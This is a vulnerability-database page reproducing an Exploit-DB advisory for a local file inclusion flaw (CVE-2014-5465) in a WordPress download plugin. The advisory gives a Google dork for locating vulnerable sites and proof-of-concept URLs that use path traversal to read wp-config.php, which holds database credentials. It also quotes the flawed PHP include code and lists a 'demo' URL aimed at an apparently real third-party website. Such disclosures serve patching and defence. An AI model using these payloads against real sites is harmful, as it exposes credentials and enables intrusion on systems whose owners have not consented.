Lucene search
K

WordPress Plugin ShortCode 0.2.3 - Local File Inclusion

🗓️ 28 Aug 2014 00:00:00Reported by Mehdi Karout & Christian GaleoneType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 39 Views

WordPress ShortCode Plugin Local File Inclusion 0.2.

Related
Code
ReporterTitlePublishedViews
Family
0day.today
WordPress ShortCode Plugin 1.1 - Local File Inclusion Vulnerability
28 Aug 201400:00
zdt
Circl
CVE-2014-5465
28 Aug 201400:00
circl
CVE
CVE-2014-5465
3 Sep 201419:00
cve
Cvelist
CVE-2014-5465
3 Sep 201419:00
cvelist
exploitpack
WordPress Plugin ShortCode 0.2.3 - Local File Inclusion
28 Aug 201400:00
exploitpack
NVD
CVE-2014-5465
3 Sep 201419:55
nvd
OpenVAS
WordPress ShortCode Plugin Directory Traversal Vulnerability
8 Sep 201400:00
openvas
Packet Storm
WordPress ShortCode 0.2.3 Local File Inclusion
26 Aug 201400:00
packetstorm
Patchstack
WordPress ShortCode Plugin 0.2.3 - Local File Inclusion
28 Aug 201400:00
patchstack
Prion
Directory traversal
3 Sep 201419:55
prion
Rows per page
#################################################################################################
#
# Title                : WordPress ShortCode Plugin - Local File Inclusion Vulnerability
# Severity             : High+/Critical
# Reporter(s)          : Mehdi Karout & Christian Galeone
# Google Dork          : inurl:wp/wp-content/force-download.php
# Plugin Version       : 0.2.3
# Plugin Name          : Download ShortCode
# Plugin Download Link : http://downloads.wordpress.org/plugin/download-shortcode.1.1.zip
# Vendor Home          : http://werdswords.com/
# Date                 : 25/08/2014
# Tested in            : Win7 - Kali Linux
# CVE                  : CVE-2014-5465
#
##################################################################################################
#
# PoC :
#
#
# http://localhost:80/wordpress/wp/wp-content/force-download.php?file=[File]
#
# http://localhost:80/wordpress/wp/wp-content/force-download.php?file=../wp-config.php
#
# Exploit Code :
#
#    $file = $_GET['file'];
#  if(isset($file))
#  {
#      include("pages/$file");
#  }
#  else
#  {
#      include("index.php");
#  }
# 
# Demo :
#
# http://llyndamoreboots.com/wp/wp-content/force-download.php?file=../wp-config.php
#
##################################################################################################

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Aug 2014 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 25
EPSS0.32789
39